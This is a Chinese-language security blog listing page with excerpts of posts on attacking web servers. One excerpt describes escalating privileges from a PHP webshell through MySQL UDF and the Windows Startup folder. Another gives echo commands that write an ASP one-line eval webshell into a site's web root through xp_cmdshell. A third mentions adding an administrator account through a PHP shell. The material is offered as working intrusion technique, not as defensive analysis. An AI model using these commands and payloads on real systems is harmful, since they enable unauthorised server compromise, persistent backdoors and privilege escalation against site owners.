体验盒子

收藏唠嗑,希望你喜欢!

phpshell写入启动项提权

2012年1月17日 安全相关 没有评论 | 热度:17 ℃

实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup"

1、连接到对方MYSQL 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中

阅读全文...

SA权限ECHO写一句话

2012年1月17日 安全相关 没有评论 | 热度:20 ℃

注入点是SA权限.
xp_cmdshell是存在的.
找到网站主目录 dir d:\wwwroot
找到站点的目录后.

1
2
3
Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp
echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp
echo "<%eval request("#")%>" >d:\wwwroot\xx\ok.asp

PHP 版Shell.Users加管理员

2011年6月16日 安全相关 没有评论 | 热度:29 ℃

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

阅读全文...

从后台到webshell的思路

2010年6月20日 懒人日志 没有评论 | 热度:85 ℃
加载中……